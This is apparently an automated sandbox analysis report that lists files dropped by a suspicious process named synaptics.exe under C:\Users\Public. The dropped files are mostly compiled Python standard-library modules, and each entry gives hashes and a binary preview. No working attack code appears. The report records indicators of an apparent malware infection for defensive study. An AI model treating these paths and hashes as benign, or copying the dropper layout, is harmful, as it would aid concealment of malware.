                                                                                                                                                                                      Preview:o........'-d.6.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.Z.d.a.d.d...Z.d.Z.d.Z.e.e.j.j...Z.e...d...Z.d.Z.d.Z.d.d...Z.d.Z.d.d...Z.g.d...Z g.d...Z!g.Z"e!D.].Z#e".$e#.%......qadid.d...Z&did.d...Z'd.d.d.d.d...Z(e...d.e.j)..Z*d.d...Z+d.d...Z,e...d.e.j)..Z-e...d.e.j.e.j)B...Z/e...d e.j0e.j)B...Z1d!d"..Z2e...d#e.j0e.j)B...Z3d$d%..Z4d&d'..Z5e...d(..Z6e...d)..Z7e...d*..Z8e...d+..Z9d,d-..Z:e...d...Z;d/d0..Z<d1d2..Z=d3d4..Z>e...d5e.j)..Z?d6d7..Z@d8d9..ZAd:d;..ZBd<d=..ZCe...d>e.j)..ZDd?d@..ZEdAdB..ZFdCdD..ZGdEdF..ZHdGZIe...dH..ZJdIdJ..ZKdKdL..ZLdMdN..ZMdOdP..ZNG.dQdR..dR..ZOG.dSdT..dT..ZPG.dUdV..dVeP..ZQdWdX..ZRdYdZ..ZSG.d[d\..d\..ZTG.d]d^..d^..ZUG.d_d`..d`eV..ZWG.dadb..dbeU..ZXdcdd..ZYG.dedf..dfeX..ZZG.dgdh..dheX..Z[d.S.)ja....HTTP cookie handling for web clients...This module has (now fairly distant) origins in Gisle Aas' Perl module.HTTP::Cookies, from the libwww-perl library...Docstrings, comments and debug
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15351
                                                                                                                                                                                      Entropy (8bit):5.447784818916672
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:LC6ZJt/SHD+IfhNGV10wqP+6JdMYFGBCeA4Gm0Ir7bDQs61vwOQY2jxP+Qh3lL44:mWJtS+Ifh8D0wqP+6JdMYsBrA4GmzfbX
                                                                                                                                                                                      MD5:257E60F28A4B45F5578C837D741100F3
                                                                                                                                                                                      SHA1:5680CAFF01297BDB33F64E1783B059A3885B3E3A
                                                                                                                                                                                      SHA-256:AF62D676940D567654BB2472ACEE702F1A384DDC19F80C776351EECEFA9775D9
                                                                                                                                                                                      SHA-512:D9B4CC8BB2A5B773005F6E1499071D3F39C5D3B403A338B37AA7833313C311EE3F46752DD9C21E142220BA3D90C28AF30E23C05249992351CD52365D87DB15E7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dfR.......................@...sZ...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.j.Z.d.j.Z.d.j.Z.G.d.d...d.e...Z.e.j.e.j...d...Z.e.d...Z.d.d...e.e.d.....e.e.e.e.......D...Z.e...e.d...d.e.d...d.i.....e...d.e...e.......j.Z.d.d...Z.e...d...Z.e...d...Z.d.d...Z.g.d...Z.g.d...Z.d.e.e.f.d.d...Z.G.d.d...d.e ..Z!d.Z"e"d ..Z#e...d!e"..d"..e#..d#..e.j$e.j%B...Z&G.d$d%..d%e ..Z'G.d&d'..d'e'..Z(d.S.)(a.....Here's a sample session to show how to use this module..At the moment, this is the only documentation...The Basics.----------..Importing is easy..... >>> from http import cookies..Most of the time you start by creating a cookie... >>> C = cookies.SimpleCookie()..Once you've created your Cookie, you can add values just as if it were.a dictionary... >>> C = cookies.SimpleCookie(). >>> C["fig"] = "newton". >>> C["sugar"] = "wafer". >>> C.output(). 'Set-Cookie: fig=newton\r\nSet-Cookie: sugar=wafer'..Notice that the printable representation of a Cookie is the.appropriate format for a
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3818
                                                                                                                                                                                      Entropy (8bit):5.547983903948432
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:6uKEn4Gs1xwkB8RpIXEz66QncxK1p9W0j+VZzmF2Q8yIcOr:QEk6oMK1a0j+DmF2QZIh
                                                                                                                                                                                      MD5:FF1EAD2607B111C4B06B0E965F5C8C2A
                                                                                                                                                                                      SHA1:1583368549A4421C080989F90C15D2140E6CACD1
                                                                                                                                                                                      SHA-256:6E7D6B15FFEA62BFFB6C5888D2428C3EA6536B8BABC31AC698321076666B37E6
                                                                                                                                                                                      SHA-512:B3D48741B95FA23AAB5CC329C679F401716E3E4C75D14C48A648C6227E7FACD45EA49CF90884B6F275E069FFF0A7C791B15416A5F397F051E0B0B9492C770B04
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dy........................@...sT...d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y)......d.d.l.m.Z...e...e.e.....Y.n.w.d.e._.d.e._.z.e...d.d...e._.W.n...e.yB......Y.n.w.e.e.j.d.<.z.d.d.l.Z.W.n...e.ye......d.d.l.m.Z...e...e.....e.e._.Y.n.w.d.e._.d.e._.z.e...d.d...e._.W.n...e.y~......Y.n.w.e.e.j.d.<.e.j.Z.e.j.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d.d...Z.i.Z.d.d...Z.d.S.).z'A pure Python implementation of import.)...__import__..import_module..invalidate_caches..reload.....N.....)..._bootstrapz.importlib._bootstrap..importlibz.__init__.pyz._bootstrap.py)..._bootstrap_externalz.importlib._bootstrap_externalz._bootstrap_external.py).r....c....................C...s"...t.j.D.].}.t.|.d...r.|.......q.d.S.).zmCall the invalidate_caches() method on all meta path finders stored in. sys.meta_path (where implemented).r....N)...sys..meta_path..hasattrr....)...finder..r.....6C:\Users\Public\QExvbmVOb25l\lib\importlib\__init__.pyr....A...s..............r....c....................C...s.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1984
                                                                                                                                                                                      Entropy (8bit):5.0264178323697895
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:eGYO7KXEXsUXrqj9FXHRLSVRibTAsKhnsRyy:MrEXxXrqhFXHPTbIsZ
                                                                                                                                                                                      MD5:2DB1553B7AE96769454D9D400C48AD48
                                                                                                                                                                                      SHA1:60BD75D3937F08AADAD444DCFF8DAFE0D30BAAFD
                                                                                                                                                                                      SHA-256:026487F41E4A286B91882F0C9EDF3BCF50D1FA30AD4E4FB7AFD7AACF9673BC74
                                                                                                                                                                                      SHA-512:3FBE631210C0C7A039D4217676CEF3D6AEF15EDE1124A1973B5F29C518A91FCF3E6A767F2322586E33B4C5FEBE3C37CEA1840728DEF07AE53B2EA50A3D0125F9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dr........................@...s8...d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.G.d.d...d.e.j.d...Z.d.S.).z>Subset of importlib.abc used to reduce importlib.util imports......)..._bootstrap.....Nc....................@...s(...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...Loaderz'Abstract base class for import loaders.c....................C...s....d.S.).z.Return a module to initialize and into which to load... This method should raise ImportError if anything prevents it. from creating a new module. It may return None to indicate. that the spec should create the new module.. N..)...self..specr....r.....2C:\Users\Public\QExvbmVOb25l\lib\importlib\_abc.py..create_module....s......z.Loader.create_modulec....................C...s....t.|.d...s.t...t...|.|...S.).a....Return the loaded module... The module must be added to sys.modules and have import-related. attributes set properly. The fullname is a str... ImportError is raised on failure...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3716
                                                                                                                                                                                      Entropy (8bit):4.669556921717515
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:udiPhyWa11p/5cIBqNU79FhTEnKIgVFKOmuD79VsUKyO9WoK/UML9Qa:bhyWGfxxB99FhkKIgDKONrsUK39WoK/L
                                                                                                                                                                                      MD5:36AD21764FD68E2A00257A3FBA2867BF
                                                                                                                                                                                      SHA1:606CBE4365409C5ACE4D6CC4C9F51ABD3B7E14DC
                                                                                                                                                                                      SHA-256:898956976FE8AAA0CD0C13D51D35C731E8D8D9508824070921FB589B9EE87100
                                                                                                                                                                                      SHA-512:1349DC1FF11154372A1BE550EF78802B1B0BEB968FBD5D820473EE955A8318589A659341C15F8A8E03507FCFCC4896F1D5809D415EC344087D0ECBD4A736F633
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sN...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d...Z.G.d.d...d...Z.G.d.d...d...Z.d.d...Z.d.S.)......)...suppress.....)...abcc....................@...s(...e.Z.d.Z.d.Z.d.d...f.d.d...Z.d.d...Z.d.S.)...SpecLoaderAdapterz>. Adapt a package spec to adapt the underlying loader.. c....................C...s....|.j.S...N)...loader....spec..r.....7C:\Users\Public\QExvbmVOb25l\lib\importlib\_adapters.py..<lambda>....s......z.SpecLoaderAdapter.<lambda>c....................C...s....|.|._.|.|...|._.d.S.r....).r....r....)...selfr....Z.adapterr....r....r......__init__....s........z.SpecLoaderAdapter.__init__c....................C........t.|.j.|...S.r....)...getattrr......r......namer....r....r......__getattr__...........z.SpecLoaderAdapter.__getattr__N)...__name__..__module__..__qualname__..__doc__r....r....r....r....r....r....r........s............r....c....................@...s ...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.)...TraversableResourcesLoaderz9. Adapt a loader
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2980
                                                                                                                                                                                      Entropy (8bit):5.201595793085135
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:MfiZ38jH+kP4PY+IewYalBABDu0ZLmJ2SOoHft3XlY2s03f/mm2vJviUeXrowab:MfipsH3ARwYali7ZL7dillY2s033mm2v
                                                                                                                                                                                      MD5:EBF28ACC37484D41F7D7EE700F89BCBC
                                                                                                                                                                                      SHA1:A38B160A3D94A83EC79F89ACA3B085768D239117
                                                                                                                                                                                      SHA-256:5CDDAC3F6C6C0BCDD8DF2934703AF86BEA1B116B9FF47A108AF28C63D61673D0
                                                                                                                                                                                      SHA-512:77086CCB56DFAF54ED58CFA240C1C786E542FBB1F736967BFE96F978B0A9BDFD5B014BBE972CDD54639DA7ACE1701D24B967EEE262675F85673C5641A672EA12
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.e.j.e.f...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.d.e.j.d...d.d.....Z.e.j.d.d.....Z.e...e.j...e.j.d.d.......Z d.S.)......N)...Union..Any..Optional.....)...ResourceReader..Traversable)...wrap_specc....................C...s....t.t.|.....S.).z3. Get a Traversable resource from a package. )...from_package..get_package)...package..r.....5C:\Users\Public\QExvbmVOb25l\lib\importlib\_common.py..files....s......r....c....................C...s....t.|...}.t.j...|...\.}.}.|.r.t.|...d.......|.S.).z.Normalize a path by ensuring it is a string... If the resulting string contains path separators, an exception is raised.. z. must be only a file name)...str..os..path..split..ValueError).r....Z.str_path..parent..file_namer....r....r......normalize_path....s..............r....c....................C...s*...|.j.}.t.|.j.d.d...}.|.d.u
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15904
                                                                                                                                                                                      Entropy (8bit):5.108311815005808
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:Ez1B5HGaViuYo8vEVbFCibM/50LbCb1EVMXS6O9PzXDPJ8OoEAuDdPTaX/DOWP6s:EVDVnR8gC/50LbjVMA9PrWCDaX/P6s
                                                                                                                                                                                      MD5:6EB15404384F6EB937E5F4A25BAE639C
                                                                                                                                                                                      SHA1:1CC389C0B2D905402C54AAB677142BBA304FE963
                                                                                                                                                                                      SHA-256:B33CBA19B287E279540EA3D50945DFFF24C1117EE08CA53F7B3C49839C6252DC
                                                                                                                                                                                      SHA-512:7CCF4B0A9FC3C3EA346FF51FB14755C78E49252DBA670FD60A359132A9E5C5EC1B431A8E3F849AB7792B895211C5AEE53EF2AC00F386EFCE750A45315EDD3871
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.:.......................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.Z.W.n...e.y...Z...z.e.j.d.k.r"..d.Z.W.Y.d.Z.[.n.d.Z.[.w.w.z.d.d.l.Z.W.n...e.y@......e.Z.Y.n.w.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d...Z.G.d.d...d.e.j.d...Z.G.d.d...d.e.j.d...Z.e.e.e.j.e.j.e.j.e.j.....G.d.d...d.e.j.d...Z.e.e.e.j.....G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.e.j.e.j.....G.d.d...d.e...Z.e.e.e.j ....G.d.d...d.e.j!e.e...Z!e.e!e.j"e.j#....G.d.d...d.e.j$e.e...Z$e.e$e.j"....G.d.d...d.e.j.d...Z%e.G.d.d ..d e.....Z&G.d!d"..d"e%..Z'd.S.)#z(Abstract base classes related to import......)..._bootstrap_external)...machinery.....N.._frozen_importlib)...Loader)...BinaryIO..Iterable..Text)...Protocol..runtime_checkablec....................G...sZ...|.D.](}.|...|.....t.d.u.r*z.t.t.|.j...}.W.n...t.y$......t.t.|.j...}.Y.n.w.|...|.....q.d.S...N)...registerr......getattr..__name__..AttributeError.._frozen_importlib_external).Z.abstract_clsZ.classes..clsZ.frozen_cls..r.....1C:\Users\Public
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):957
                                                                                                                                                                                      Entropy (8bit):5.425235583484172
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:C2kBAzUYcjBN/8XHmE16iGMwigQFM4u0LIX7OujdiXg8G94OlWRXqnrmHO28sVtP:UjoXT16iGMJgQFpAquj8G/OXsrmH58K
                                                                                                                                                                                      MD5:DA06D21DDC1EAC2CA61D3875E276E0E6
                                                                                                                                                                                      SHA1:FB8AC8D021A8BF74412C54D957ECFE7AF37D3415
                                                                                                                                                                                      SHA-256:7703B4740A0600C45643AD3956896BAF39F83392015D2AC0ADE3782E674115C2
                                                                                                                                                                                      SHA-512:193296CBD3645BDF6FE1B80BFE936782F65D1FC3D12C322D4F44BA3652740C155E098FB490CB919E81E21442171A3EB87689CD245D350D5C542219409ED18335
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dR........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d...Z.d.S.).z9The machinery of importlib: finders, loaders, hooks, etc......)...ModuleSpec)...BuiltinImporter)...FrozenImporter)...SOURCE_SUFFIXES..DEBUG_BYTECODE_SUFFIXES..OPTIMIZED_BYTECODE_SUFFIXES..BYTECODE_SUFFIXES..EXTENSION_SUFFIXES)...WindowsRegistryFinder)...PathFinder)...FileFinder)...SourceFileLoader)...SourcelessFileLoader)...ExtensionFileLoaderc....................C...s....t.t...t...S.).zAReturns a list of all recognized module suffixes for this process).r....r....r......r....r.....7C:\Users\Public\QExvbmVOb25l\lib\importlib\machinery.py..all_suffixes....s......r....N)...__doc__.._bootstrapr....r....r......_bootstrap_externalr....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r......<module>....s............................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5195
                                                                                                                                                                                      Entropy (8bit):4.878952110496418
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:yPv9CoTQ1zsquRgowzdmCbBavWMPTjTzKuhXBoPTl906kEt7IQ7ClEXsjMptAWrD:sQ1ztyvedlbB7IruuhXBoPTlK9EhIQOi
                                                                                                                                                                                      MD5:76BB53375638FFA69573474BA7051154
                                                                                                                                                                                      SHA1:4CCF8855DAF5E80016B6EC6BCD75FFCA2677E1CC
                                                                                                                                                                                      SHA-256:C9540B4776B6CE764F16245863BE26AC0EC4A558D60048085726DCA64290661E
                                                                                                                                                                                      SHA-512:1BC1149475DDA1B60C855997DAA897FDFAF12D9FECE033F23783EAEAF003FE863EC1909F9037D383716D756AAD97852D13E0A3D841CD78610C8CCC2D5A6A379E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d~........................@...sx...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.S.)......N.....)...abcc....................C...s....t.t.j...|.....S...N)...iter..collections..OrderedDict..fromkeys)...items..r.....5C:\Users\Public\QExvbmVOb25l\lib\importlib\readers.py..remove_duplicates...........r....c....................@....$...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...FileReaderc....................C...s....t...|.j...j.|._.d.S.r....)...pathlib..Path..path..parent)...self..loaderr....r....r......__init__....s......z.FileReader.__init__c....................C........t.|.j...|.....S...z{. Return the file system path to prevent. `resources.path()` from creating a temporary. copy.. ....strr......joinpath..r......resourcer....r....r......resource_path...........z.FileReader.resource_pathc....................C........|.j.S.r......r......r....r....r....r......files...........z.FileRea
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5382
                                                                                                                                                                                      Entropy (8bit):5.3427306086604975
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:ozYSudPIqJNGeMzW9dlfxVf0JJgFGx6qjBfjO6y3SnKL49oNhbMrhKgTlv:oJBnS9xVfSJgGx6AjI3SKyhRTlv
                                                                                                                                                                                      MD5:355B8ACC990EB8BDB7DE27B48CE71264
                                                                                                                                                                                      SHA1:B038521CD40697D8FBB1D41CB6E2EAFA971347ED
                                                                                                                                                                                      SHA-256:E9DC0D672BC1EEF054731F8934870B61BEB1017E90DE2612C0F06FFA7638FEF3
                                                                                                                                                                                      SHA-512:8A90CAAE1973D8340F6F1F799D5A0D6C457E42FBEA782374EA524D435F166D9A69467ED80DE6CB49A6AFE7F652F98247ABDF5F9299FB2110D3699930728732B3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z e.e!e.f...Z"e.e!e.j#f...Z$d.e"d.e$d.e.f.d.d...Z%....d3d.e"d.e$d.e!d.e!d.e.f.d.d...Z&d.e"d.e$d.e'f.d.d...Z(....d3d.e"d.e$d.e!d.e!d.e!f.d.d ..Z)d.e"d.e$d.d!f.d"d#..Z*d$d%..Z+d&d'..Z,d(d)..Z-d.e"d*e!d.e.f.d+d,..Z/d.e"d.e.e!..f.d-d...Z0e.d/d0....Z1e1.2e...d1d2....Z3d.S.)4.....N.....)..._common)...as_file..files)...ResourceReader)...suppress)...ResourceLoader)...ModuleSpec)...BytesIO..TextIOWrapper)...Path)...ModuleType)...ContextManager..Iterable..Union)...cast)...BinaryIO..TextIO)...Sequence)...singledispatch)...Package..Resourcer....r......contentsr......is_resource..open_binary..open_text..path..read_binary..read_text..package..resource..returnc....................C...s&...t...|...}.t...|...}.t...|...}.|.d.u.r.|...|...S.t.t.|.j...}.|
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9342
                                                                                                                                                                                      Entropy (8bit):5.320515236210884
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:TptTll1YVqQzvbab+Q3+LbcwE5lFz0w7/RhZT:Fbl1YVqoeb+QuLbpmFz06RhZT
                                                                                                                                                                                      MD5:7DCA14AE783831BBD4B26FD6739B9A07
                                                                                                                                                                                      SHA1:B36C9646AF55A5D70DAF83C497064E1F319AA5AB
                                                                                                                                                                                      SHA-256:36CB19B2B54EF2381D6B12CF683D50E36C7FB65F540E72FA910E756F79C13C8A
                                                                                                                                                                                      SHA-512:BB9711DCDE240D30A124D98D6968D9E9ED78E399AF29CFD76B32FAE07D8568208A51DE4E602CE377649C0D4125D3355F47E2823F640ED66A0B2E4F9C50E9F42B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s*...d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d...Z.d.d...Z.d$d.d...Z.d$d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.G.d d!..d!e.j...Z.G.d"d#..d#e...Z d.S.)%z-Utility code for constructing importers, etc......)...Loader)...module_from_spec)..._resolve_name)...spec_from_loader)..._find_spec)...MAGIC_NUMBER)..._RAW_MAGIC_NUMBER)...cache_from_source)...decode_source)...source_from_cache)...spec_from_file_location.....)...contextmanagerNc....................C...s....t...t.|...S.).zBReturn the hash of *source_bytes* as used in hash-based pyc files.)..._imp..source_hashr....)...source_bytes..r.....2C:\Users\Public\QExvbmVOb25l\lib\importlib\util.pyr........s......r....c....................C...s\...|...d...s.|.S.|.s.t.d.t.|.....d.......d.}.|.D.].}.|.d.k.r...n.|.d.7.}.q.t.|.|.d.....|.|...S.).z2Resolve a rela
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):37109
                                                                                                                                                                                      Entropy (8bit):5.211135547824197
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:uBMjZ3JEQWRwd2Aj+j5El+bA16p34b50nOlt8/:uBcAL9iGzo+Ol2/
                                                                                                                                                                                      MD5:706FA61D17268A4091EDE182B4E3A133
                                                                                                                                                                                      SHA1:77A232EB856F6A0E9D196CCB73DF87BF42857E36
                                                                                                                                                                                      SHA-256:A64D2B6721E76F9BF16DF684B075DC951341C481E3D58D8E97B8285CFA8EA312
                                                                                                                                                                                      SHA-512:05B1763589211ACA3E2B89D2A3E8C911DADF23718F6E75631096FB527E3DB2CF8DC22A2400EC19B05AD12DC0C774CD734B88250F97D702960EBF1BFADCA53973
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.{.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l.m"Z"..d.d.l#m$Z$m%Z%m&Z&m'Z'..g.d...Z(G.d.d...d.e)..Z*G.d.d...d...Z+G.d.d...d.e..,d.d.....Z-G.d.d...d.e...Z/G.d.d...d.e/..Z0G.d.d...d...Z1G.d.d...d.e1e2..Z3G.d.d ..d e.j4..Z5G.d!d"..d"..Z6G.d#d$..d$..Z7G.d%d&..d&e!..Z8G.d'd(..d(..Z9G.d)d*..d*..Z:G.d+d,..d,..Z;G.d-d...d.e8..Z<G.d/d0..d0e7..Z=d1d2..Z>d3d4..Z?d5e.j.f.d6d7..Z@d8d9..ZAd5e'e0e3f...f.d:d;..ZBd<d=..ZCd>d?..ZDd5e%eEe$eE..f...f.d@dA..ZFd.S.)B.....N.....)..._adapters.._meta)...PackageMetadata)...FreezableDefaultDict..Pair)...method_cache..pass_none)...unique_everseen).r......SimplePath)...suppress)...import_module)...MetaPathFinder)...starmap)...List..Mapping..Optional..Union)...Distribution..DistributionFinderr......PackageNotFoundError..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2357
                                                                                                                                                                                      Entropy (8bit):5.1624174943294525
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:2NuvHOKjpXocKHdq5UHdUktPdSNwplt9SDYvloUTG:nHOKVocKHdqUdUWlSWplZ9oEG
                                                                                                                                                                                      MD5:A945D7BB9F2DE2BF3460500751A23CA6
                                                                                                                                                                                      SHA1:4E5D568C85CD04770363C5C086DECB6CD097BCB6
                                                                                                                                                                                      SHA-256:CC812D97107EA715BE48A6D4E29A2E0BF4DEC3A9E0FD36718A5B646647C154BE
                                                                                                                                                                                      SHA-512:4529EDC37BEACD04FFAF163A753FC90855692004201B503C9DE31BEFE53EB14C4B83B68D295300343F04E7E2FF249A1762E529D253BC5102BCADDABB7619CEC0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s<...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...G.d.d...d.e.j.j...Z.d.S.)......N.....)...FoldedCasec........................sb...e.Z.d.Z.e.e.e.g.d.......Z...d.e.j.j.f...f.d.d...Z.d.d...Z...f.d.d...Z.d.d...Z.e.d.d.....Z.....Z.S.)...Message).Z.Classifierz.Obsoletes-DistZ.Platformz.Project-URLz.Provides-Distz.Provides-Extraz.Requires-Distz.Requires-Externalz.Supported-PlatformZ.Dynamic..origc........................s"...t.....|...}.t.|.....t.|.......|.S...N)...super..__new__..vars..update)...clsr......res....__class__...@C:\Users\Public\QExvbmVOb25l\lib\importlib\metadata\_adapters.pyr........s..........z.Message.__new__c....................O...s....|.....|._.d.S.r....)..._repair_headers.._headers)...self..args..kwargsr....r....r......__init__#...s......z.Message.__init__c........................s....t.......S.r....).r......__iter__..r....r....r....r....r....'...s......z.Message.__iter__c........................s>...d.d.......f.d.d...t.|...d...D...}.|.j.r
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1532
                                                                                                                                                                                      Entropy (8bit):5.027155941299097
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:zBf0kCRklLM8ZOSIJOmhgP3uSDOTVMPt/fkWB16RB6lghkChedco/qq6Ddqrqqp:zBf0Xkl4KOSI4mh6peqdcWB1cegfhe+y
                                                                                                                                                                                      MD5:A5646FFF089FF9D442BAAF434C70042E
                                                                                                                                                                                      SHA1:00EDB10142F241C6317C908DEE1A5F8DC403386B
                                                                                                                                                                                      SHA-256:3CA7DF4106EA2F4EA77424EC5D34B5A90AE3DF2D783D86AA3592CAA4608C1421
                                                                                                                                                                                      SHA-512:B2E20FC96E2905E0393DA4634192CA5830D05611A58DE9391F6C92AE7D5CFCE7C006D988A3088C78A7C57FF7B3BB35446143EE71AF5354DE8C532184D28E688F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
